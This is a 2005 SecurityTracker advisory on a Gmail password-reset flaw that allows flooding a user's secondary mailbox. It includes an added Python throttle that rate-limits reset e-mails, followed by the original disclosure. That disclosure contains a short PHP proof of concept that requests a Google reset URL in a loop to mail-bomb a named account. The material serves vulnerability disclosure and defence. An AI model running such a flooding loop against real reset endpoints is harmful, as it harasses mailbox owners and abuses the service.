Gmail 'forgot your password?' Feature Lets Remote Users Flood a User's Secondary E-mail Account

SecurityTracker Alert ID: 1012749
SecurityTracker URL: http://securitytracker.com/id/1012749
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jan 2 2005
Impact: Host/resource access via network
Exploit Included: Yes

Description:
Joxean Koret reported a vulnerability in the Gmail service. A remote user can cause a large amount of e-mail to be sent to the target user's secondary address.
The Gmail service 'forgot your password?' feature allows a remote user to load a certain URL to cause the service to send a validation e-mail to the specified user's secondary e-mail address. There is no limit to the number of messages sent over a period of time, so a remote user can flood the target user's secondary e-mail address.
The vendor was notified on September 26, 2004.
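
The control the description says is missing, a limit on how many validation e-mails are sent for one account over time, sketched as an added example (not code from the advisory, from the vendor, or from SecurityTracker). The class and function names, the 5-minute cooldown, the 5-per-day cap and the lower-casing of the account key are assumptions chosen for illustration.

```python
import time
from collections import defaultdict, deque

class ResetMailThrottle:
    """Decides whether a password-reset e-mail may be sent for an account."""

    def __init__(self, cooldown=300, max_per_day=5, clock=time.monotonic):
        self.cooldown = cooldown          # assumed: min seconds between mails
        self.max_per_day = max_per_day    # assumed: cap per rolling 24 hours
        self.clock = clock
        self._sent = defaultdict(deque)   # account -> timestamps of sent mails

    def allow(self, account):
        # Key on the target account, not the client address: the mailbox
        # owner is the one flooded, whoever is issuing the requests.
        key = account.strip().lower()
        now = self.clock()
        sent = self._sent[key]
        while sent and now - sent[0] >= 86400:
            sent.popleft()                # forget sends older than 24 hours
        if sent and now - sent[-1] < self.cooldown:
            return False                  # too soon after the previous mail
        if len(sent) >= self.max_per_day:
            return False                  # daily cap reached
        sent.append(now)
        return True

def handle_reset_request(account, throttle, send_mail):
    """Same response either way; a mail goes out only if the throttle allows."""
    if throttle.allow(account):
        send_mail(account)
    return "If the account exists, a reset message has been sent."

def simulate(requests, step_seconds):
    """Replay identical reset requests on a fake clock; return mails sent."""
    t = [0.0]
    throttle = ResetMailThrottle(clock=lambda: t[0])
    outbox = []
    for _ in range(requests):
        handle_reset_request("victim@example.test", throttle, outbox.append)
        t[0] += step_seconds
    return len(outbox)

if __name__ == "__main__":
    # Constructed input: 15 requests one second apart, then 200 requests
    # spaced ten minutes apart to exercise the rolling daily cap.
    print(simulate(15, step_seconds=1))
    print(simulate(200, step_seconds=600))
```

The state here is in-process memory; a deployed service would need the same counters in storage shared by every front end that can trigger the mail.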

Impact:
A remote user can cause a large amount of e-mail to be sent to the target user's secondary e-mail account.

Solution:
No solution was available at the time of this entry.

Vendor URL: gmail.google.com/

Cause:
Access control error, State error

Underlying OS:

Message History:
None.

Source Message Contents

Date: Sat, 01 Jan 2005 20:15:14 +0000
Subject: GMail E-Mail Bomber

---------------------------------------------------------------------------
GMail E-Mail Bomber
---------------------------------------------------------------------------
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GMail - Gmail is an experiment in a new kind of webmail, built on the idea
that you should never have to delete mail and you should always be able to
find the message you want
Web : http://gmail.google.com
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
A. E-Mail Bomber

The problem is the following: if any gmail user forgets the password,
he/she can answer a question or send to his/her secondary e-mail addresses
a password reset confirmation e-mail. Well, with GMail we can flood the
secondary e-mail box of GMail users.

I wrote a very basic Proof Of Concept in PHP:

<?php
/******************************************
 *
 * GMail bomber Proof Of Concept
 * Date time : Sun. Sep-26-2004
 * Author : Jose Antonio Coret
 * E-Mail :
 *   joxeankoret@yahoo.es
 *   joxean.piti@gmail.com
 *
 ******************************************/
$gmail_account = "any.gmail.address@gmail.com";
$google_cgi = "https://www.google.com/accounts/VerifySecretAnswer";
$google_cgi_params = "?continue=http://gmail.google.com/gmail&service=mail&Email=$gmail_account&SendEmail=true&IdentityAnswer=";
$emails_to_send = 15;
$bomber_url = "$google_cgi$google_cgi_params";
echo("GMail bomber\n");
echo("P.O.C. provided by Jose Antonio Coret (Joxean Koret)\n\n");
echo("Starting flood against $gmail_account ... \n\n");
for ($i = 0; $i < $emails_to_send; $i++)
{
    echo("Sending e-mail number " . ($i + 1) . " ... ");
    $fd = fopen($bomber_url, "r");
    fclose($fd);
    echo("Ok.\n");
}
echo("\n");
echo("Finish...\n");
?>

The fix:
~~~~~~~~
The vendor was contacted on Sun, 26 Sep 2004 21:11:55 but the problem still
continues unfixed as of Sun, 26 Dec 2004.

Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es